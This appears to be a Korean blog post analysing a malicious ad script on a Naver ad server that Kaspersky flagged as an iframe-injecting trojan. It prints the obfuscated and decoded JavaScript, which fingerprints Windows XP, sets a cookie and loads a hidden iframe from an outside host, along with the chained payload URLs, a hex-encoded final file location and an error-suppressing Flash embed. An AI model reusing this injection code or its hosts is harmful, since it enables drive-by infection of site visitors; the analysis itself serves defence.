네이버 카스퍼스키 (HEUR:Trojan.Script.Iframer) 진단 사이트 보기 !!

* 네이버 어느 페이지에서 감염되었는지는 모르겠다는걸 알려 드립니다!

최초 진단 사이트 : HEUR:Trojan.Script.Iframer (카스퍼스키)

링크 : http://n37.nsmartad.com/imp?slot=3451&ads=57314&tid=1&type=as

document.write("OK");
var info=navigator.userAgent.toLowerCase();var August=info.indexOf("windows nt 5.1");if(document.cookie.indexOf('veatpr')==-1&&August>0){var expires=new Date();expires.setTime(expires.getTime()+24*60*30*1000);document.cookie='veatpr=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70% 생 략 %65%3E"));}

OK
var info=navigator.userAgent.toLowerCase();var August=info.indexOf("windows nt 5.1");if(document.cookie.indexOf('veatpr')==-1&&August>0){var expires=new Date();expires.setTime(expires.getTime()+24*60*30*1000);document.cookie='veatpr=Yes;path=/;expires='+expires.toGMTString();<iframe src= http://wap.helloshop.ixfx/a18/my.html ?cdkey width=25 height=0></iframe>}

my.html 하위 사이트 연결 !!

http://wap.helloshop.ixfx/a18/my.html?cdkey

• http://wap.helloshop.ixfx/a18/fun.htm?莖폭渡괩1119
• http://wap.helloshop.ixfx/a18/new.html?劤壙젬꺄1119

fun.htm?莖폭渡괩1119

HEX :
687474703A2F2F3132312E37382E3134372E3137352F4167732F4147532E676966

http://121.78.147.175/Ags/AGS.gXf ~> 최종파일

new.html?劤壙젬꺄1119

 var January="<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n"+
 "<object width=\"550\" height=\"400\">\r\n"+
 "<param name=\"movie\" value=\"done.swf\">\r\n"+
 "<embed src=\" Birthday.swf \" width=\"550\" height=\"400\">\r\n"+
 "<\/embed>\r\n"+
 "<\/object>"